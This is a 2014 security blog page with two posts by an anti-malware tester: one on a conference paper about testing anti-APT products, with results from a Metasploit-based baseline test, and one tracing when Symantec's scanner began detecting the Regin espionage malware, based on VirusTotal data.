Tuesday, 25 November 2014

Effectively testing APT defences

There is a need to test products that claim to detect and protect against advanced threats.

When incredible claims are made by security products so should we make strong efforts to challenge and possibly validate these claims.

Over the past year and a half I have discussed testing with a range of vendors, testers and potential customers of such products. These discussions have varied from very positive to extremely defensive and illogical on the part of some vendors.

To put it this way, we have some anti-APT kit in the lab ready for such a test but equipment from one or two important vendors is elusive, to say that least.

Such testing has also been a regular point of debate at the Anti-Malware Testing Standards Organization, of which I am currently the Chair, and so two AMTSO colleagues (Richard Ford, Florida Institute of Technology and Gabor Szappanos, Sophos) joined me to write a paper called Effectively testing APT defences.

Gabor and I presented this at the AVAR 2014 conference in Sydney, on the 12th - 14th November 2014.

The paper examines some of the problems that surround testing such technologies (real and merely perceived) and questions the definition of the term "APT" in a constructive way. It also walks the reader through an example of a targeted attack and notes where certain types of testing would be deficient when using such an attack as a test case.

In the presentation, but not the paper, I also demonstrated how a 'baseline' set of tests, using unmodified Metasploit-based attacks, made mincemeat of some well-known anti-malware products. One enterprise solution stopped four out of 25 threats. We were able to obtain reverse shells in 21 cases and, just as an experiment, migrated into the anti-malware agent's own process.

This basic test demonstrated that a range of tools, tactics and techniques could be used to test different levels of protection from actors ranging from 'zero' (almost no skill/resources) to 'Neo' (effectively unlimited skills/resources).

Not every tester is capable of 'Neo' testing and some may not wish to conduct 'zero' testing, but as long as the report explains what approaches were taken and why it's hard to understand why an anti-APT vendor would object to tests that could be considered "too easy."

While the paper does not provide a single, ultimate methodology for anti-APT testing I believe that the document does outline some valid approaches, none of which are, "do not test!"

Regin: When did protection start?

Regin, advanced malware that is most likely a government espionage tool, is making headlines.

This is because it's a very well-constructed set of tools and also because observers are surprised at how successful it was. It also targeted GSM networks, which is novel.

The big question is, how could the major anti-malware firms have missed this threat for so long?

Or, one might ask, did they really miss it or quietly detect it?

Some people appear to believe that, as Regin was probably created and used by Western governments, then Western anti-malware companies colluded to ignore the threat.

Symantec seems to have been slow to notice Regin because its write-up of Backdoor.Regin claims that it was discovered in December 2013, which is much later than March 2011, when Microsoft updated its definitions to include Regin.A.

In an effort to find a history of Symantec's detection of this malware I obtained an archive of Regin samples from security researcher Claudio Guarnieri and asked the kind folk at VirusTotal to discover when, if ever, Symantec's scanner first detected each sample.

Before we look at these results I want to be clear about what these results mean and what they do not because VirusTotal data is easily abused and dodgy conclusions readily-reached.

The table below indicates that Symantec's technology was capable of detecting most of the samples as being at least suspicious from February 2010. It then made a clearer classification of being a 'Trojan' from March 2011.

Only yesterday (24th November 2014) did it officially label the threat as 'Regin'. This corresponded to its announcement of the Regin threat.

Usually the problem with using VirusTotal is that someone will upload some files, show that product X failed to recognise them and then conclude that the product, or the entire anti-virus industry, is useless.

In this case we can see dates relating to when the product detected the files as threats. Possibly the product would have protected against these files even earlier, and possibly those that appear as having been missed (Classification = 'nothing') would have been stopped through some other layer of protection not related to file signatures.

So I see the following as a worst-case scenario. Symantec's scanner recognised most of these files as threats from around 2011 onwards. Maybe it was capable of stopping them and maybe not - we can't know that for sure. But it's fair to assume that if a signature-based scanner can recognise a file then it will probably generate an alert at the very least.


I've focussed one Symantec simply because it first announced the Regin malware, minutes before other vendors joined in.